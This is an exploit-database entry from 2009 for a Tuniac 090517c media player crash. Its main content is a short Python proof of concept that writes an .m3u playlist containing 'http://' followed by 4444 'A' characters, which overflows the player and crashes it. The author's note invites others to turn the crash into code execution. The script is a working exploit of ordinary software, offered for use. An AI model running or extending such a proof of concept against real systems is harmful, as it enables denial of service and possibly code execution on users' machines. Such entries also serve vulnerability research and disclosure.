Lucene search

K
exploitdbDr_IDEEDB-ID:9364
HistoryAug 05, 2009 - 12:00 a.m.

Tuniac 090517c - '.m3u' Local File Crash (PoC)

2009-08-0500:00:00
Dr_IDE
www.exploit-db.com
21

AI Score

7.4

Confidence

Low

EPSS

0.044

Percentile

92.6%

#!/usr/bin/env python

##############################################################################################
#
# Tuniac v.090517c (.M3U) Crash PoC
# Found By: Dr_IDE
# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
#
##############################################################################################

# Play around here, anything seems to knock it out.
buffer = ("http://" + "\x41" * (4444));

f = open('Dr_IDE.M3U','w');
f.write(buffer);
f.close();

# milw0rm.com [2009-08-05]

AI Score

7.4

Confidence

Low

EPSS

0.044

Percentile

92.6%

Related for EDB-ID:9364